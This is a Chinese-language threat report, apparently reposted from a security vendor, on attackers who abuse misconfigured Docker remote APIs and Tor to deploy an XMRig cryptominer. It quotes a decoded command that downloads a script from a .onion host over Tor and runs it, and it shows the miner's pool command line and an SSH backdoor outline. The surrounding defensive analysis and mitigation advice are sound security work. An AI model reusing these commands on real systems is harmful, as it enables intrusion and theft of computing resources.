揭露利用 Tor 网络的 Docker 漏洞攻击链

关键发现

• 新型攻击结合 Docker 远程 API 与 Tor 匿名网络，在受害系统隐秘部署加密货币挖矿程序

• 攻击者利用配置不当的 Docker API 获取容器环境访问权限，通过 Tor 隐藏活动痕迹

• 主要攻击目标为云计算密集型行业：科技公司、金融服务机构和医疗组织

• 攻击工具链包含 zstd 压缩工具（基于 ZStandard 算法，以高压缩比和快速解压著称）

攻击流程分析

初始访问阶段

攻击始于对 Docker Remote API 的探测请求（源 IP: 198[.]199[.]72[.]27），随后攻击者创建挂载宿主机根目录的 Alpine 容器，通过 base64 编码隐藏恶意命令：

# 解码后的攻击命令sh -c curl --socks5-hostname tor:9050 -o /docker-init.sh http[:]//xxx.onion/static/docker-init.sh && chmod +x /docker-init.sh && /docker-init.sh

恶意脚本功能

1. SSH 后门配置

2. 修改宿主机 SSH 配置允许 root 登录

3. 植入攻击者公钥实现持久化访问

4. 工具安装

5. 部署 masscan 端口扫描工具

6. 安装 zstd 压缩工具和 torsocks 代理工具

7. C2 通信

8. 通过.onion 域名向攻击者 C2 服务器回传系统信息

9. 有效载荷投递

10. 通过 Tor 网络下载 Zstandard 压缩的恶意二进制文件（system-linux-$(uname -m).zst）

挖矿程序部署

最终执行的 XMRig 矿工包含完整配置：

./system -o pool.moneroocean.stream:10128 -u 49... -p x -a rx/0

MITRE ATT&CK 技术映射

防御建议

1. 严格配置 Docker API 访问权限，仅允许可信网络访问

2. 容器运行时禁止使用 root 权限

3. 定期审计容器镜像及运行实例

4. 启用 Trend Vision One™威胁检测功能（提供相关 IOC 狩猎查询）

威胁指标(IOC)

更多精彩内容 请关注我的个人公众号 公众号（办公 AI 智能小助手）公众号二维码

办公AI智能小助手